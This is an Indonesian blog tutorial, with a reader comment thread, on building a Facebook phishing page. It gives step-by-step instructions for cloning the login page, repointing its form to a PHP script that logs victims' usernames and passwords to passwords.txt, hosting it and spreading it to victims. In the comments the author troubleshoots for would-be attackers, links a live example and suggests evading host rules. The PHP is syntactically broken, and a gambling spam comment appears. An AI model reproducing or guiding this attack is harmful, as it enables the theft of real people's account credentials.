Cara Membuat Web Phising

Cara membuat Web Phising Facebook – Pada postingan kali ini saya akan membahas tentang cara membuat web phising. walaupun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang ingin tahu tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? Web Phisng = WEB+ Phising.
Web menurut saya adalah sebuah page/halaman yang berisi content yang di isi oleh admin/pemilik web, lebih lengkapnya kesini. Phising menurut dari yang saya baca yaitu berasal dari kata “Fishing” atau di bahasa Indonesia kan yang memiliki arti “memancing”. Lho kok Memancing? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam perangkap Web Phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :

  1. Cari dan buka alamat yang mau dijadikan homepage/halaman utama Web Phising anda. misal http://www.facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol “Ctrl + U” di keyboard secara bersamaan. Kemudian akan muncul Source Code.
  3. Copy semua Source Code?tersebut. Tekan “Ctrl + A(untuk blok semua source code) kemudian tekan “Crtl + C(untuk meng-copy / menyaslin Source Code tersebut).
  4. Setelah itu buka notepad/wordpad (Start – all program – accessories- Notepad/Wordpad) ?di WINDOWS?atau gedit (Applications – ?Accessories – Gedit Text Editor) di LINUX.
  5. Paste Source Code?(ctrl + v) yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan “Crtl + F”, isi dengan “action=(tanpa tanda petik)
  7. Ketemu
    <form action="fb.com" method="post">
  8. Ganti fb.com” (contoh) dengan “phising.php”.
  9. Ubah “postmenjadi “GET“.
  10. Save as (file – Save as) atau tekan “Ctrl + S”. Berinama dengan “index.html” dan File Type pilih “All FIle”
  11. .Buka notepad lagi (langkah sama seperti nomor 4).
  12. Copy Paste Code PHP ini ke notepad :
    <?php header ('Location: http://fb.com ');
    $handle = fopen(passwords.txt, a);
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, =);
    fwrite($handle, $value);
    fwrite($handle, rn);
    }
    fwrite($handle, rn);
    fclose($handle);
    exit;
    ?>
  13. Ganti “http://fb.com” dengan “http://facebook.com” misal (tanpa tanda kutip).
  14. Save dengan nama phising dan extensi .php jadinya phising.php (Caranya sama seperti langkah no. 10)
  15. Upload ke hosting anda. (Silahkan cari hosting gratis atau berbayar, tidak disarankan menggunakan Hosting Gratis 000webhost untuk membuat web phising. Namun jika ingin tahu Cara Upload File di Free Hosting 000webhost silahkan baca saja. Satu lagi, pastikan domain anda sudah mengarah ke hosting anda. Jika anda tidak mengerti silahkan pelajari tentang Domain dan Hosting terlebih dahulu.
  16. Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk file passwords.txt, agar password yang di ketikan oleh korban dapat tersimpan.
  17. Selesai. Silahkan Coba akes Domain anda dan apa yang anda lihat? Jika tampilan mirip seperti halaman ketika anda membuka website yang anda tiru berarti benar.
  18. Silahkan anda test apakah WebPhising buatan anda sukses dapat menyimpan email dan password korban.
  19. Jika berhasil menyimpan informasi login korban seperti email dan password, waktunya sebarkan web phising anda dengan kecerdikan anda.

Sekian dulu postingan cara membuat web phising apabila anda masih bingung jangan malu bertanya. 😀

Published by

amri

Seorang penulis blog yang suka meng-kode juga suka musik dan otomotif. Nah lho bingung kan wkwkwk

0 thoughts on “Cara Membuat Web Phising”

    1. makasi mas, keren nih infonya
      tujuannya bukannya buat ngambil pasword ama username ya? misal kalo di atas. nanti kita isa dapet password ama username FB.
      CMIIW

      1. Itu terserah anda. Kalo korban sudah masuk ke web phising buatan anda tinggal apa yang tersedia di web phising anda. Jika di web phising tersebut meminta untuk memasukan user password, seperti membuat web phising facebook misalnya. :ngelamun:

    1. Saya masih nuwbiee gan :hehe:
      Ok gan sarannya saya terima. :sip:
      Ngomong2 themes yang di pake agan itu themes apa ya ?? hasil coding sendiri ?? :bisik:

  1. 1. Untuk no.8 kita Lihat no.7. Disana kita menemukan script menuju “url web asli” yang artinya setelah kita login akan di arahkan ke web asli tersebut. Namun untuk cara membuat web phising kita harus mengubah url yang menuju ke web asli ke web buatan kita, web tersebut saya beri nama “phising.php”.
    Untuk no.16 kita harus merubah permission di file password.txt karena file tersebut harus read and write artinya bsa memembaca dan menulis, membaca untuk kita melihat password yang sudah tersimpan di “password.txt”,namun apabila chmod/permission tidak di ganti menjadi 777 maka password korban tidak akan tersimpan.
    2. Untuk menjalankan anda tinggal buka saja alamat web phsing anda. Kemudian untuk mendapat user/email dan password itu terserah anda.
    Ma’af saya sedang menggunakan hp butut untuk membalas koment anda jadi agak sulit. Apabila masih ada kesulitan silahkan berkomentar. 🙂

      1. Emang kenapa harus buat webphising lagi ? sudah jadi kah ?
        Kita tinggal perbaiki yang salah saja dimana. Tidak perlu membuat lagi…

  2. Say thank you for have really fantastic informations. Your world-wide-web is greatI am impressed by the material that you have on this weblog. It exhibits how well you understand this topic. Bookmarked this method web page, will come back for far more. You, my buddy, awesome! I discovered just the specifics I already looked all over the place and just couldn?t discover. What a ideal website. Similar to this web site your web site is one of my new much-loved.I like this info shown and it has provided me some kind of idea to possess good results for some reason, so keep up the fantastic function!

      1. mksd saya gini,,
        ketika orang masukkan (cnth) username, paswot , itu larinya kemana biar kita bisa membuka nya (hack),web pising kita terhubung ke email or memang ada inbox spesial untuk username or paswot yg sudah diketikkan tsb,,
        mkmsii sblmnya.

        1. coba cek lagi postingan saya diatas. Tepatnya No.12, teliti scriptnya yang saya beri bolt ( teks tebal ). Baris No. 3 ada tulisan “passwords.txt”. itu dia, password akan tersimpan di file password.txt.
          Kalau mau buka tinggal ketik di address browser kamu sbb :
          http://namadomain.tld/password.txt. Bagaiman ? kurang jelas ? tanyakan lagi. dengan senang hati saya menjawab 🙂

  3. oh,,
    iya,,iya,,,
    sya jg newbie ,jdinya harus banyak tanya biar agak mngrti,,
    nah,skrg gimana mengenai phising yg masuk k inbox facebook,dengan sediki kata-kat mereka menyuruh kita meng klik satu link yg klo dibuka itu berisi sebuah web phising, mksd saya mereka hebat membuat sebuah web, dapat dari mana ya mereka ??

  4. wah,,,
    saya sudah coba step by step, saya tdk mngrti, dan susah untuk mnegerti,
    apa lgi step nmr 15,,terlebih semuanya
    mohon di bimbing,,
    apa anda ada email ??

  5. Kalu itu tergantu ke cerdasan kita untuk memancing korban dengan kata2 anda sendiri. Saya buat web phising ini hanya buat pembelajaran saja dan tidak untuk mencari korban. Jadi untuk tahap berikutnya bisa anda praktekan sendiri. Tapi ingat : RESIKO TANGGUNG PENUMPANG :))
    Mau coba ada neh di http://cekpulsa.co.tv < < saya pisah dari blog saya karena takut resiko di suspend :))

  6. cek pulsa itu streaming kan ?bagian mana nya yg merupakan phsing ??
    nah,skrg sy mnt pendapat anda,
    ada fb mainan saya yg inbox nya terdpat web phising,
    apa sama dgn tuts anda yg d atas,
    saya kasih disini id sama paswotnya or gmna ?

  7. MEMBUKA PERMISSION NY TU DR MANA GAN???
    TRUS,,FILE YG MANA LG HARUS KITA SIMPAN MENJADI ::PASSWORD.TXT::???
    WA MSH BINGUNG X NI MMBUAT NYA…..
    MAKLUUUMMM,,NEWBIE…..
    HEHEHEHE
    MOHON AJARAN NY Y GAN……

  8. kita tinggal buat file lewat text document / notepad / wordprad. Terus tinggal di upload lewat file manager di cpanel. permision ada di file manager di cpanel.

  9. Ganti URL WEB ASLI dengan phising.php ( phising.php hanya perumpamaan, bisa anda ganti namun harus semua dengan kata phising.php nantinya di ganti dengan nama.php anda ).
    Ubah ?post? menjadi ?GET?.
    itu ane gk ngerti

    1. Kalo bingung ikutin saya aja, buat dengan nama “phising.php”.
      Nah diatas kan tertera <form action="URL WEB ASLI" method="post">. Agan ganti post dengan GET.

  10. Save dengan nama phising dan extensi .php jadinya phising.php
    Upload ke hostingan anda.
    Jangan lupa permission di atur 777 untuk file passwords.txt
    gan di savenya 2 kali ya yg pertama formatnya phising.txt terus yg keduax bebas misalnya qmail.php gitu ya, terus yg passwordnyadi ganti di mananya

    1. Masuk aja dulu ke control panel hosting agan… cari menu file manager… nah disitu nanti ada menu lagi untuk upload file agan.. 🙂

    1. Udah tau apa itu hosting ?
      Udah punya hosting ?
      Kalo belum punya silahkan daftar free hosting saja di google banyak. Lalu masuk cpanel dan cari file manager.

  11. broo.., aq dah buat smua file na nie..,
    file.html
    file.php
    file.txt
    trus dah gwe apload ke freewebhostingarea.com.., kemudian gmana cara na kta bka wab na itu broo, chmod na jga dah gwe ganti dgn 777 slanjut na gimna lgi nie broo.., mohn bimbingn na ya 😉

    1. Hosting itu adalah tempat untuk menyimpan file yang kamu buat itu. Hosting bisa berbayar atau free… kamu bisa pilih sendiri….

    1. Kalo 4shared itu file hosting mas,,, Bukan webhosting. Yang mas butuhkan itu webhosting karena mas akan membuat Web Phising. 😀

  12. gan gimana nih aku masih binggung kok pas di buat udah bisa tapi pas di test log in error?? mohon bantuan nya

  13. gan saya gk ngerti.. smua nya sudah jadi..dan sudah di upload ke 000webhost.com
    tapi saya binggung URL saya yg mana yah..
    dan gimana gw bisa tau web url phising punya saya..
    (newbie gan)

    1. Nah itu seh tergantu kreatifitas kamu aja. Ma’af saya tidak mengajarkan hack/merusak.
      Tutorial diatas cuma sebagai pengetahuan saja. 😀

    1. Banyak komentar yang masih nyangkut di server lama gan sorry.
      – jawaban pertanyaan no. 16
      Setelah anda upload file – file yang sudah anda buat di hosting pasti anda akan menemukan option permission/chmod. Silahkan langsung anda praktikkan saja dan lihat di file manager.

  14. bang masa pas sudah saya tulis (action=) kaga ada yang keluar,,,yang ada hanya tanda hijau di tulisa ACTION= nya,,,
    apa ada kesalahan ya???
    tolong jelasiin bang !!

    1. Tadi saya iseng nyari ketemu <form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)">
      Untuk bsa gaknya silahkan anda coba sendiri.

  15. Gan tnya,,taruh kata kita dah buat web phising kaya yg agan ajarin lha setelah itu gmana? apa otomatis seluruh user+pass akun facebook (misalnya) lari ke web hostingan kita? trims

  16. maaf bng saya mau tanya ada gk cara gampang dan praktis untuk memboboL mail to facebook dengan mudah.. kLu da bisa di jelasin mail saya.. X) makasih..

    1. Dibaca dulu sampai selesai. Pada poin berikutnya sudah di jelaskan cara membuat phising.php
      Cara membuat ekstensi php tinggal rename aja yang tadi nya file .txt menjadi .php

    1. Mengijinkan agar passwords.txt dapat di eksekusi, dibaca dan di tulis oleh semua pihak…
      Klao passwords.txt gak diubah ke chmod 777 email dan password tidak akan tersimpan karena tidak memiliki hak akses.

    1. Sebenernya 000webhost.com tidak mengijinkan script seperti ini dipasang di server mereka tp kalau mau coba – coba dan gak ketahuan ya gak papa itung2 coba2.
      ada 3 file :
      Index.html
      phising.php
      passwords.txt

  17. Thanks gan saya dah coba dan berhasil.
    pertama tama saya coba pakai punya saya dulu
    dan ada di password.txt

  18. sebelumnya terima kasih atas share ilmunya..saya dah buat sesuai petunjuk diatas, sudah mencoba untuk masuk web phising yang saya buat dan coba asal login, tp di password.txt tetap kosong(sudah diganti 777) dimanakah letak kesalahannya?apakah cara ini sudah tidak mempan, tolong penjelasannya.trims

    1. Kurang tau gan udah lama gak mainan phising…. Tapi baca deh komentar di atas ada salah satu yang berhasil. Nanti kalo ada waktu luang boleh deh saya coba lagi cara diatas…
      Yang penting

      jangan lupa.

  19. Berkunjung balik kawand, mas kalo phising kan untuk halaman tipuan, tau cara bikin redirect ga’ mas, bantuin dunk, jadi kalau web diakses akan mengarah ke web yg lain gitu…?

  20. maaf aku kurang tau dengan statement yang diatas pa beloh diperjelas gak, aku sudah buka facebook dan menekan ctrl+u secara bersamaan tapi source code nya tidak ada?cara nya gimana ya tolong dikasih tau lagi ya?

  21. maaf a saya ingin bisa tapi tidak bisa melakukan langkah di atas, bukan kah kata si aa lebih baik bertanya dari pada sesat di jalan?kalau boleh kirim no HP si aa ke email saya,mungkin dengan cara mempraktekan lewat telfon saya bisa paham dan mengerti cara membuat web phishing tersebut. terimakasih sebelumnya……..

      1. saya susah di pahami a lw tutorial nya lewat tulisan, mungkin lw tutorial lewat video/suara (telfon), mngkin sya bisa, sekalian jga kita lebih dekat dan menjalin tali persodaraan a.

        1. Itu di filenya di setting chmod nya ke 777 artinya supaya file tersebut bisa di tulis,dibaca dan dieksekusi oleh user,grup dan lainnya.

    1. Iya, terus nambah satu lagi bua file kosong dengan nama passwords.txt.
      kalo bingung buat sekalian di komputer terus tinggal upload, jadi 3 file kalo sama passwords.txt

  22. ga cara bikin phising facebook mobile gimana..??
    ane udah coba yang facebook versi desktop sukses tapi yang buat mobile belum bisa..

  23. yang sudah pernah belajar basic html pasti paham dengan langkah2 di atas… 🙂
    cuman sayang, saya masih belum begitu paham tentang upload ke web hosting.
    tutorialnya apakah ada, mas bro??

  24. saya sudah selesai meng-upload ke hosting,tp kok setelah di buka linknya gk berhasil hanya ada bacaan index of/,,,,,letak kesalahannya di mana ya mas?apakah emng karna memakai hosting gratisan ya????tolong di ksh tau solusinya,,,,,

      1. ada tp file itu sm dgn file yg da dlm publik_html yg aq upload sblumnya,,tp stlh di klik mlh file trsebut menuju tmpt download,,,,

  25. gan ane masih belum ngerti gan……
    yang pas peng upload.annye
    tolong bantuannya gan….ane pengen bisa
    mas amri , ni no ane
    08571831xxxx
    thx

    1. Kalo cara mengupload belum bisa silahkan cari-cari tutorial untuk cara upload file ke hosting terlebih dahulu. Dan maaf saya tidak melayani telp/sms, ada pertanyaan diblog silahkan tanyakan via komentar, ym/email, atau skype saja..

  26. mas gan mo tanya ne, ntar klo liat pwnya lewat “PPP” yg ada dmna? di comp ato di uploadtan hosting sendiri? mkasih

  27. maksud Ini apa yah ??
    Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk filepasswords.txt, agar password yang di ketikan oleh korban dapat tersimpan.

  28. SAYA UCAPKAN TERIMA KASIH KEPADA MBAH_KERAMAT, YG SUDAH MEMBANTU KESUSAHAN SAYA DENGAN MEMBERIKAN NOMOR TOGEL KEPADA SAYA.
    SAYA SANGAT BERSUKUR SEKALI KARENA NOMOR YG DIBERIKAN 4D(0215) TEMBUS 100%.
    BERKAT SEMUA ITU SAYA SUDAH LUNASI HUTANG2 SAYA SEBANYAK 175 JUTA DI BANK BRI.
    DAN SAYA SUDAH BUKA USAHA BERKAT MENANG NOMOR TOGEL YANG DI BERIKAN SAMA MBAH_KERAMAT…..
    -JIKA ANDA SERING KALAH DALAM BERMAIN TOGEL?
    -APAKAH ANDA TERMASUK DALAM KATEGORI DIBAWAH INI
    1. Di Lilit Hutang
    2. Selalu kalah Dalam Bermain Togel
    3. Barang berharga Anda udah Habis Buat Judi Togel
    4. Anda Udah ke mana-mana tapi tidak menghasilkan Solusi yang tepat.
    HUB MBAH_KERAMAT DI NO: 0878-4293-7066-
    .ANGKA TOGEL YANG DIBERIKAN MBAH_KERAMAT. TIDAK PERLU DIRAGUKAN LAGI.SAYA JAMIN 100% TEMBUS . SOAL YA SAYA SUDAH MEMBUKTIKAN 5X PUTARAN SAYA DIBANTUH
    DIJAMIN ANDA PASTI MENANG SEPERTI SAYA>>>>>>
    .(`??.?(` ??. ?* ?.???)?.???)..
    ?? Thanks sOb rOoMnyA ?`?
    ..(?. ???(?.??? * `??.?)`??.? )..
    SALAM KOMPAK SELALU?.dan selamat buat yg JEPE hari ini?..
    ???????????????

  29. Gw Sih Sudah Bisa Buat Phising Tapi Percuma../ Karena Di Blockir Sm Internet Positif
    Jdi Gk Bisa Di Buka 🙁

  30. PHP nya bermasalah mas. Malah muncul”Parse error: syntax error, unexpected ‘=’ in /home/u920835651/public_html/phising.php on line 5″

    1. Maaf sebelumnya karena jarang keurus blog nya jadi banyak post yang error..
      Untuk file yang diupload ada 3 yaitu : index.html, phising.php dan password.txt

  31. keluar ginian aja
    Parse error: syntax error, unexpected ‘=’ in /storage/ssd1/993/2028993/public_html/phising.php on line 5
    trus gmna???

Leave a Reply